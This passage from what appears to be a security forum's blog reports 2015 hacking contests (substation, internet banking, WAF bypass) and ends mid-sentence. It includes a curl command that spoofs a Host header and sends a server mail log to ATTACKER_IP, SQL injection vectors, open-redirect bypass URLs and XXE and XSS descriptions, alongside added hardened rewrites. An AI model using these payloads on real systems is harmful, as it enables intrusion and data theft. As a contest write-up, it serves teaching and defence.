src="https://www.youtube.com/embed/w8T-bbO3Qec" width="480"></iframe> <br />This year's format combined various competitions with the capture-the-flag contest. CTF teams, along with the rest of the forum's participants, were able to take part in them (see the article on <a href="http://blog.phdays.com/2015/05/making-money-on-cyberwar.html">our blog</a>). 
About 50 PHDays attendees and several CTF teams took part in Digital Substation Takeover.<br /><br /><b><span style="font-size: large;">Technical details</span></b><br /><br />The model used the following equipment:<br /><br /><ul style="text-align: left;"><li>Siemens SICAM PAS v. 7.0,</li><li>common protective relays and switchgear,</li><li>GPS and GLONASS time servers,</li><li>industrial network switches.</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-Xiw_HNY6gqQ/VXl_Fwr-_YI/AAAAAAAAFDY/gP1sm_iaYsk/s1600/Sohranennoe-izobrazhenie-2015-5-15_11-50-27.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="252" src="http://1.bp.blogspot.com/-Xiw_HNY6gqQ/VXl_Fwr-_YI/AAAAAAAAFDY/gP1sm_iaYsk/s640/Sohranennoe-izobrazhenie-2015-5-15_11-50-27.jpg" width="640" /></a></div><div><br /></div><div><b><span style="font-size: large;">The course of the contest</span></b></div><br /><br />Since the contest was held at PHDays for the first time, and because of its specialised subject, participants spent the first day studying power-system protection, switchgear, and interlocking. 
They had to analyze large amounts of information found on specialised forums, vendors' sites, and so on.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-pT27E0ecgh8/VXl_VQ3VTPI/AAAAAAAAFDg/zgqZ2TxwWrw/s1600/IMG_2040-580x435.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="http://2.bp.blogspot.com/-pT27E0ecgh8/VXl_VQ3VTPI/AAAAAAAAFDg/zgqZ2TxwWrw/s640/IMG_2040-580x435.jpg" width="640" /></a></div><br />The contest comprised several tasks of different difficulty levels:<br /><br /><ul style="text-align: left;"><li>temporary disruption of the substation's information infrastructure (achieved six times);</li><li>reprogramming a time server (once);</li><li>unauthorized disconnection of consumers (twice);</li><li>finding a previously unknown vulnerability (once).</li></ul><br />The most difficult task was to take control of the primary equipment and issue a command bypassing the interlocking. No one managed to solve this task (though one team got quite close).<br /><br />Sergey Sidorov took first place, and Alexander Kalinin came second. 
RDot and ReallyNonamesFor gained some points for hacking the substation.<br /><br /><b><span style="font-size: large;">Not quite at ease</span></b><br /><br />During the contest, representatives of power supply companies, such as the Federal Grid Company of Unified Energy System (FGC UES), were watching the process closely.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-d0AwzXDSt9U/VXl_yrwSw1I/AAAAAAAAFDo/e2lTXkQqs0s/s1600/Seleznev-170x170.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-d0AwzXDSt9U/VXl_yrwSw1I/AAAAAAAAFDo/e2lTXkQqs0s/s1600/Seleznev-170x170.jpg" /></a></div>"To tell the truth, when I saw those people lounging in beanbags and hacking industrial control and protection systems for some virtual profit, I felt uncomfortable," said Mikhail Seleznev in an interview [ru] with Digital Substation, an online magazine. Mikhail is the head of the ICS and metrology division of the relay protection department at FGC UES. "No one can guarantee that a group of such creative individuals won't gather together and use the knowledge they obtained during this contest to crack real infrastructure—just for the fun of it. Are they aware of the weight of the possible consequences of such actions?"<br /><br />However, Mikhail doubts that it is IEC 61850 that should undergo any changes: "The standard should continue to develop for the benefit of the purposes it was designed for. Information security should be the subject of other standards. There has been much talk about ICS protection recently. In fact, it is important to engage representatives of power supply companies in such discussions—and in putting new methods into practice."<br /><br />iGRIDS, the organizers of the contest, recorded everything that occurred on the stand. 
By the middle of the contest, it became obvious that the range of threats was broader than they had expected. The developers assure us that they will take the new attack variants into account when developing subsequent versions of their protection systems. And they have already been invited to take part in PHDays VI!</div>How They Hacked Internet Banking at PHDays V (published 2015-06-05)<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-uMcrwJt-4y8/VXG0-Lj5KbI/AAAAAAAAFCo/_I8Z5TCbw3o/s1600/snatch1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="432" src="http://3.bp.blogspot.com/-uMcrwJt-4y8/VXG0-Lj5KbI/AAAAAAAAFCo/_I8Z5TCbw3o/s640/snatch1.png" width="640" /></a></div><br />During Positive Hack Days V, held on May 26 and 27 in Moscow, the <a href="http://www.phdays.com/program/contests/#16296" target="_blank">$natch</a> competition was organized again. It consisted of two rounds. First, the contest's participants were given copies of virtual machines containing the vulnerable web services of an internet banking system (an analog of a real one). Then they had to analyze the banking system image and try to transfer money from the bank to their own accounts by exploiting the security flaws they had found.<br /><a name='more'></a><br />This year's format combined various competitions with CTF (see <a href="http://blog.phdays.com/2015/05/making-money-on-cyberwar.html" target="_blank">our blog</a>), and CTF teams were able to take part in them along with the rest of the forum's attendees. Thirty people participated in $natch. 
The prize money was raised to 40,000 rubles (<a href="http://blog.phdays.com/2014/05/the-natch-contest-is-over.html" target="_blank">last year</a> it was 20,000).<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-W9yMnwV0C84/VXG1OhbjrOI/AAAAAAAAFCw/bO7OkqiuZ4I/s1600/snatch2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="310" src="http://3.bp.blogspot.com/-W9yMnwV0C84/VXG1OhbjrOI/AAAAAAAAFCw/bO7OkqiuZ4I/s640/snatch2.png" width="640" /></a></div><br /><b><span style="font-size: large;">Technical details</span></b><br /><br />PHDays iBank was developed especially for the contest. It contained vulnerabilities of the kinds that occur in real banking systems. The system was divided into a frontend and a backend that exposed a simple RESTful API, which is why participants needed to study the communication protocol between the components of the internet banking system.<br /><br />A typical internet banking system contains logical vulnerabilities (related to weak validation, which leads to data leakage) rather than crude security lapses that allow malicious code to be injected and executed. 
The contest's banking system mainly contained the former.<br />PHDays iBank offered 10 banking accounts with seven vulnerability combinations (the more sophisticated the vulnerability, the more money there was in the account).<br /><br />Participants could perform such attacks as:<br /><br /><ul style="text-align: left;"><li>brute-force using a list of the most common passwords available on the web;</li><li>hack accounts by bypassing their two-factor authentication;</li><li>exploit vulnerabilities in password-reset algorithms;</li><li>experiment with the test script that was used to check API backend status (validation bypassing, arbitrary file reading);</li><li>bypass the postponed-payment protection mechanism (the attack allowed stealing money from other contestants' accounts).</li></ul><br /><b><span style="font-size: large;">Examples of vulnerabilities</span></b><br /><br />The test script included the following code:<br /><br /><pre style="font-family: Courier New, Courier, monospace;">
&lt;?php

if ($_SERVER['HTTP_HOST'] != 'ibank.dev') {
    exit;
}

if (empty($_GET['url'])) {
    exit;
}

$parts = parse_url($_GET['url']);
$port = empty($parts['port']) ? '' : ':' . $parts['port'];
$url = "http://{$parts['host']}$port/status";

$ch = curl_init();

curl_setopt_array($ch, [
    // CURLOPT_URL => $_GET['url'],
    CURLOPT_URL => $url,
    CURLOPT_HEADER => false,
    CURLOPT_RETURNTRANSFER => true,
]);

if (!empty($_GET['params'])) {
    curl_setopt_array($ch, [
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => $_GET['params']
    ]);
}

var_dump(curl_exec($ch));

curl_close($ch);
</pre><br />It was possible to bypass hostname validation. 
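<br /><br />As an added example (not the contest's code), here is the same status check written so that neither the Host-header gate nor the @ file upload is available to a caller; the client allowlist and the backend map are constructed values.<br /><br />

```php
<?php
// Added example, not the PHDays iBank code: a hardened rewrite of the api_test.php
// status checker. The client allowlist and the backend map below are constructed.
declare(strict_types=1);

// 1. The original compared $_SERVER['HTTP_HOST'] with 'ibank.dev', but the Host
//    header is whatever the client sends (curl -H 'Host: ibank.dev'). Gate the
//    script on something the client does not control; behind a reverse proxy use
//    the proxy's own access control instead, or do not ship the script at all.
$allowedClients = ['127.0.0.1', '::1'];
if (!in_array($_SERVER['REMOTE_ADDR'] ?? '', $allowedClients, true)) {
    http_response_code(403);
    exit;
}

// 2. The original built the target from a caller-supplied URL (parse_url host and
//    port), which is an SSRF surface. Accept a backend *name* and resolve it from
//    a fixed map so the set of reachable hosts is closed.
$backends = [
    'api1' => 'http://10.0.0.11:8080',   // constructed addresses
    'api2' => 'http://10.0.0.12:8080',
];
$name = $_GET['backend'] ?? '';
if (!is_string($name) || !isset($backends[$name])) {
    http_response_code(400);
    exit;
}
$url = $backends[$name] . '/status';

$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL            => $url,
    CURLOPT_HEADER         => false,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => false,  // a redirect must not widen the target set
    CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
    CURLOPT_CONNECTTIMEOUT => 2,
    CURLOPT_TIMEOUT        => 5,
    // 3. With safe uploads on, a field value such as "@/var/www/.../mail.log" is
    //    sent as a literal string instead of being read from disk. This is the
    //    default since PHP 5.6 and the only behaviour since PHP 7; it is set
    //    explicitly so the intent is visible on older interpreters.
    CURLOPT_SAFE_UPLOAD    => true,
]);

if (!empty($_GET['params']) && is_array($_GET['params'])) {
    // 4. Forward scalar key/value pairs only, serialised with http_build_query.
    //    A string body is never treated as a multipart upload, whatever the
    //    values contain, and nested arrays cannot be smuggled in.
    $params = array_filter($_GET['params'], 'is_scalar');
    curl_setopt_array($ch, [
        CURLOPT_POST       => true,
        CURLOPT_POSTFIELDS => http_build_query($params),
    ]);
}

$body = curl_exec($ch);
$code = (int) curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// 5. The original var_dump()ed the whole response, so whatever the backend
//    returned was relayed to the caller. Report only what a status check needs.
header('Content-Type: application/json');
echo json_encode([
    'backend'   => $name,
    'http_code' => $code,
    'up'        => $body !== false && $code === 200,
]);
```

<br /><br />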
Since the params array was passed straight to CURLOPT_POSTFIELDS, PHP's curl extension treated a value starting with @ as a file to upload, so the following request could be sent:<br /><br /><span style="font-family: Courier New, Courier, monospace;">curl -H 'Host: ibank.dev' 'http://SERVER_IP/api_test.php?url=http://ATTACKER_IP/&params\[a\]=@/var/www/frontend/data/logs/mail.log'</span><br /><br />Having obtained the log of sent messages, a participant could find the passwords of accounts that had used the password recovery system.<br /><br />To bypass two-factor authentication, participants used a vulnerability described in an article on <a href="http://sakurity.com/blog/2015/03/15/authy_bypass.html">Sakurity.com</a>. During the contest, it turned out that not all the participants were aware of that vulnerability: some of them simply tried all possible values, as in the old days.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-67yOEzY3WaY/VXG1iRTxqyI/AAAAAAAAFC4/eDMBotX1cks/s1600/snatch3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="324" src="http://2.bp.blogspot.com/-67yOEzY3WaY/VXG1iRTxqyI/AAAAAAAAFC4/eDMBotX1cks/s640/snatch3.png" width="640" /></a></div><br /><b><span style="font-size: large;">The battle</span></b><br /><br />Apart from attacking the internet banking system, participants could steal money from other contestants' accounts. More Smoked Leet Chicken chose this method and won the contest, making 15,000 rubles. Stas Povolotsky, who took second place, managed to steal 3,200 rubles from the contest's bank.<br /><br />It's worth mentioning that RDot detected and exploited the largest number of vulnerabilities. 
However, the team failed to protect the money it had earned, and More Smoked Leet Chicken took advantage of this and stole the money from RDot's account.<br /><br />Final scoreboard<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-IIaNcn8H-Rs/VXG1pgOhG0I/AAAAAAAAFDA/4wvWyE-JQZI/s1600/snatch4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="310" src="http://2.bp.blogspot.com/-IIaNcn8H-Rs/VXG1pgOhG0I/AAAAAAAAFDA/4wvWyE-JQZI/s640/snatch4.png" width="640" /></a></div><br />Congratulations to the winners!<br /><br /></div>Unknownnoreply@blogger.com242tag:blogger.com,1999:blog-5176771794789502609.post-67593903891294090292015-06-03T17:42:00.000+03:002015-06-03T17:42:03.703+03:00WAF Bypass at Positive Hack Days V<div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-V1-QFPPGglM/VW8OGj5ucqI/AAAAAAAAFA0/6k5zyU4bUrQ/s1600/waf1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="http://3.bp.blogspot.com/-V1-QFPPGglM/VW8OGj5ucqI/AAAAAAAAFA0/6k5zyU4bUrQ/s640/waf1.jpg" width="640" /></a></div><br />As it <a href="http://blog.phdays.com/2014/07/review-of-waf-bypass-tasks.html">did last year</a>, the PHDays forum on information security hosted WAF Bypass this year as well. The contest's participants tried to bypass the protection of <a href="http://www.ptsecurity.com/products/af/">PT Application Firewall</a>, Positive Technologies' product. For this contest, the organizers developed the site Choo Roads, which contained common vulnerabilities such as Cross-Site Scripting, SQL Injection, XML External Entities Injection, and Open Redirect. Upon exploiting one of the vulnerabilities, a participant obtained a flag in MD5 format and gained points. 
MD5 flags could be found in the file system, the database, and cookie parameters, and were detected by a special bot developed using Selenium.<br /><a name='more'></a><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-0oEaGNwh6rc/VW8OblbLfeI/AAAAAAAAFA8/uRMhgGSpPf8/s1600/waf2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="392" src="http://1.bp.blogspot.com/-0oEaGNwh6rc/VW8OblbLfeI/AAAAAAAAFA8/uRMhgGSpPf8/s640/waf2.png" width="640" /></a></div>Although the contest WAF configuration left room for bypasses, uncommon solutions were also presented. This was actually the goal of the contest: participants had the opportunity to test themselves at bypassing protection mechanisms, while we can improve our product based on the results. Let's have a look at those vulnerabilities and bypass techniques.<br /><br /><b><span style="font-size: large;">Warmup</span></b><br /><br />The vulnerability was in the script that tracked user activity on the site.<br /><br /><pre style="font-family: Courier New, Courier, monospace;">
POST /online.php HTTP/1.1
Host: choo-choo.phdays.com
Connection: keep-alive
Content-Length: 24
Content-Type: application/json
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36

{"timestamp":1432906707}
</pre><br />The timestamp field values from the JSON data in the POST request were not validated before being used in the SQL query:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-2vBs6_qiuMw/VW8OzG27_jI/AAAAAAAAFBE/Tw7qq_mkrw0/s1600/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.27.05.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="120" src="http://4.bp.blogspot.com/-2vBs6_qiuMw/VW8OzG27_jI/AAAAAAAAFBE/Tw7qq_mkrw0/s640/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.27.05.png" width="640" /></a></div>To bypass the check, you could replace the Content-Type with text/xml; the POST data were then not processed as JSON, so the check was not applied.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-1gA9bvfWIPI/VW8O-qMQ8XI/AAAAAAAAFBM/ZhOJ7xJ3zws/s1600/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.27.53.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="74" src="http://1.bp.blogspot.com/-1gA9bvfWIPI/VW8O-qMQ8XI/AAAAAAAAFBM/ZhOJ7xJ3zws/s640/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.27.53.png" width="640" /></a></div><b><span style="font-size: large;">XSD validation</span></b><br /><br />The site had a ticket search form that built an XML request and sent it to the back end.<br /><div class="separator" style="clear: both; text-align: center;"><a 
href="http://4.bp.blogspot.com/-Hq4VDAYaKck/VW8QUuO5bPI/AAAAAAAAFBU/cprnJcbn-w0/s1600/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.29.20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="224" src="http://4.bp.blogspot.com/-Hq4VDAYaKck/VW8QUuO5bPI/AAAAAAAAFBU/cprnJcbn-w0/s640/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.29.20.png" width="640" /></a></div>An XSD schema was used to validate the XML request.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-2iHOQHneT_A/VW8QeJX9FUI/AAAAAAAAFBg/Z4q8U0B8pCs/s1600/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.34.14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="446" src="http://1.bp.blogspot.com/-2iHOQHneT_A/VW8QeJX9FUI/AAAAAAAAFBg/Z4q8U0B8pCs/s640/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.34.14.png" width="640" /></a></div>According to the schema, the id attribute had to contain exactly 35 characters. The attribute value was inserted into the SQL query without validation. Bypassing therefore required a vector that met the XSD requirements:</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-gk15TkAOt2A/VW8Qsb18sYI/AAAAAAAAFBo/t6OPgHYDUGo/s1600/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.35.15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="104" src="http://4.bp.blogspot.com/-gk15TkAOt2A/VW8Qsb18sYI/AAAAAAAAFBo/t6OPgHYDUGo/s640/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.35.15.png" width="640" /></a></div><pre style="font-family: Courier New, Courier, monospace;">
&lt;search id="');select box(flag) from flag--____"&gt;&lt;/search&gt;
&lt;search id="');select flag::int from flag -- "&gt;&lt;/search&gt;
</pre><br /><b><span style="font-size: large;">Open Redirect</span></b><br /><br />The vulnerability was in the "to" parameter of the script redirect.php. The flag was appended to the URL fragment of the redirect target, so it never reached the server side. To get the flag, you had to send the bot to another site hosting a page that read the value from location.hash and passed it to a logger.<br /><br />Bypass options:<br /><br /><pre style="font-family: Courier New, Courier, monospace;">
http://choo-choo.phdays.com/redirect.php?to=phdays.com:asd@host.com
http://choo-choo.phdays.com/redirect.php?to=http://ahack.ru%23.phdays.com/
http://choo-choo.phdays.com/redirect.php?to=http%3a//www.samincube.com%3f\..\\www.phdays.com
</pre><br /><b><span style="font-size: large;">XML External Entities Injection</span></b><br /><br />The script that handled XML data was vulnerable to XXE. 
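<br /><br />Two added defender-side checks (example code, not from the Choo Roads site): a redirect-target validator that rejects all three bypass vectors listed under Open Redirect, and an XML loader for the ticket search that refuses any DOCTYPE only after the parser has decoded the body, which is what catches the parameter-entity and UTF-16 variants described next. The allowed hosts, the schema and the sample inputs at the bottom are constructed.<br /><br />

```php
<?php
// Added example, not the contest's code. Allowed hosts, schema and inputs are constructed.
declare(strict_types=1);

const ALLOWED_REDIRECT_HOSTS = ['choo-choo.phdays.com', 'www.phdays.com'];

/**
 * Returns a canonical absolute URL if $to points at an allowed host, else null.
 * Every bypass above defeats a substring or prefix match on the raw string; the
 * host component of the parsed URL is what the browser actually connects to.
 */
function safe_redirect_target(string $to): ?string
{
    // Browsers treat "\" as "/", parse_url() does not: refuse it rather than
    // reason about the difference (vector 3). Control characters likewise.
    if (strpbrk($to, "\\\0\r\n") !== false) {
        return null;
    }
    $p = parse_url($to);
    // "phdays.com:asd@host.com" parses with scheme "phdays.com" and no host at all
    // (vector 1); "http://ahack.ru#.phdays.com/" has host "ahack.ru" (vector 2).
    if ($p === false || !isset($p['scheme'], $p['host'])) {
        return null;
    }
    $scheme = strtolower($p['scheme']);
    $host   = strtolower($p['host']);
    if (!in_array($scheme, ['http', 'https'], true)) {
        return null;
    }
    if (isset($p['user']) || isset($p['pass'])) {   // userinfo has no honest use here
        return null;
    }
    if (!in_array($host, ALLOWED_REDIRECT_HOSTS, true)) {
        return null;
    }
    // Rebuild the target from the parsed parts instead of echoing the input;
    // any fragment supplied by the caller is dropped.
    $url = $scheme . '://' . $host;
    if (isset($p['port'])) {
        $url .= ':' . $p['port'];
    }
    $url .= $p['path'] ?? '/';
    if (isset($p['query'])) {
        $url .= '?' . $p['query'];
    }
    return $url;
}

/**
 * Loads untrusted XML with external entity resolution disabled and rejects any
 * document carrying a DTD. libxml decodes UTF-16 (BOM or declaration) before it
 * sees "<!DOCTYPE", so a byte-level filter for that string is neither needed nor,
 * as the UTF-16 bypass shows, sufficient. Requires PHP 7.4+ (arrow function).
 */
function load_untrusted_xml(string $raw, string $xsd): ?DOMDocument
{
    libxml_use_internal_errors(true);
    // Belt and braces: even if some option later enables substitution, no
    // external resource (file://, http://, a remote DTD) can be fetched.
    libxml_set_external_entity_loader(static fn() => null);

    $dom = new DOMDocument();
    // No LIBXML_NOENT and no LIBXML_DTDLOAD: entities are not substituted and the
    // external subset is not loaded. LIBXML_NONET forbids network access.
    if (!$dom->loadXML($raw, LIBXML_NONET)) {
        return null;
    }
    // A parameter entity, an internal or an external subset all need a DOCTYPE,
    // and the ticket search has no legitimate use for one.
    if ($dom->doctype !== null) {
        return null;
    }
    // Schema validation is still useful, but the 35-character id it enforces is
    // exactly the length the injection vectors above were padded to: the value
    // must still be bound as a query parameter when it reaches SQL.
    return $dom->schemaValidateSource($xsd) ? $dom : null;
}

// Constructed schema for the ticket search, with the 35-character id constraint.
$ticketXsd = <<<'XSD'
<?xml version="1.0"?>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
  <xs:element name="search"><xs:complexType>
    <xs:attribute name="id" use="required"><xs:simpleType>
      <xs:restriction base="xs:string"><xs:length value="35"/></xs:restriction>
    </xs:simpleType></xs:attribute>
  </xs:complexType></xs:element>
</xs:schema>
XSD;

// Constructed inputs, given as $_GET would deliver them (percent-decoded).
$targets = [
    'phdays.com:asd@host.com',
    'http://ahack.ru#.phdays.com/',
    'http://www.samincube.com?\..\\\\www.phdays.com',
    'https://choo-choo.phdays.com/tickets?from=MSK#x',   // only this one passes
];
foreach ($targets as $t) {
    printf("%-48s => %s\n", $t, safe_redirect_target($t) ?? 'rejected');
}

$paramEntity = '<?xml version="1.0"?><!DOCTYPE s [<!ENTITY % e SYSTEM "http://dtd.invalid/x.dtd"> %e;]>'
    . '<search id="' . str_repeat('a', 35) . '"/>';
$utf16 = "\xFF\xFE" . mb_convert_encoding(
    '<?xml version="1.0" encoding="UTF-16"?><!DOCTYPE s [<!ENTITY x SYSTEM "file:///some/file">]>'
    . '<search id="&x;"/>', 'UTF-16LE', 'UTF-8');
$clean = '<search id="' . str_repeat('a', 35) . '"/>';   // only this one is accepted
foreach (['parameter entity' => $paramEntity, 'UTF-16 body' => $utf16, 'clean' => $clean] as $k => $xml) {
    printf("%-16s => %s\n", $k, load_untrusted_xml($xml, $ticketXsd) ? 'accepted' : 'rejected');
}
```

<br /><br />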
The bypass required referencing the external entity from a parameter entity:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-sQ4sccs6FGc/VW8Q-8v3YEI/AAAAAAAAFBw/S8a_RDAwubE/s1600/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.36.26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="195" src="http://4.bp.blogspot.com/-sQ4sccs6FGc/VW8Q-8v3YEI/AAAAAAAAFBw/S8a_RDAwubE/s640/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.36.26.png" width="640" /></a></div>It was also possible to bypass the filter by encoding the request in UTF-16.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-LcWPs4R7w5o/VW8RHgzt8eI/AAAAAAAAFB4/yVztcwyGook/s1600/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.37.03.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="52" src="http://2.bp.blogspot.com/-LcWPs4R7w5o/VW8RHgzt8eI/AAAAAAAAFB4/yVztcwyGook/s640/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.37.03.png" width="640" /></a></div><b><span style="font-size: large;">Cross-Site Scripting</span></b><br /><br />The vulnerability was in the site's search page. To obtain the flag, you could send the bot's cookies to the site. 
The bypass used non-standard tag attributes that bootstr­ap-validator processes, which allowed JS code to be executed:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-RMi_fwXvlak/VW8RS0OOJpI/AAAAAAAAFCA/rvQJ1842_UI/s1600/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.37.43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="26" src="http://1.bp.blogspot.com/-RMi_fwXvlak/VW8RS0OOJpI/AAAAAAAAFCA/rvQJ1842_UI/s640/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.37.43.png" width="640" /></a></div>Or:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-B7vhZLMSPRA/VW8RbTU_kxI/AAAAAAAAFCI/UZaKtVpWq-s/s1600/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.38.22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="44" src="http://3.bp.blogspot.com/-B7vhZLMSPRA/VW8RbTU_kxI/AAAAAAAAFCI/UZaKtVpWq-s/s640/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA%2B%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0%2B2015-06-03%2B%25D0%25B2%2B17.38.22.png" width="640" /></a></div><br /><b><span style="font-size: large;">Results</span></b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-ids5sCUPJNw/VW8RnKlhywI/AAAAAAAAFCQ/FATm7eqBdKg/s1600/waf3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="314" src="http://3.bp.blogspot.com/-ids5sCUPJNw/VW8RnKlhywI/AAAAAAAAFCQ/FATm7eqBdKg/s640/waf3.png" width="640" /></a></div><br />The winner of the contest is 
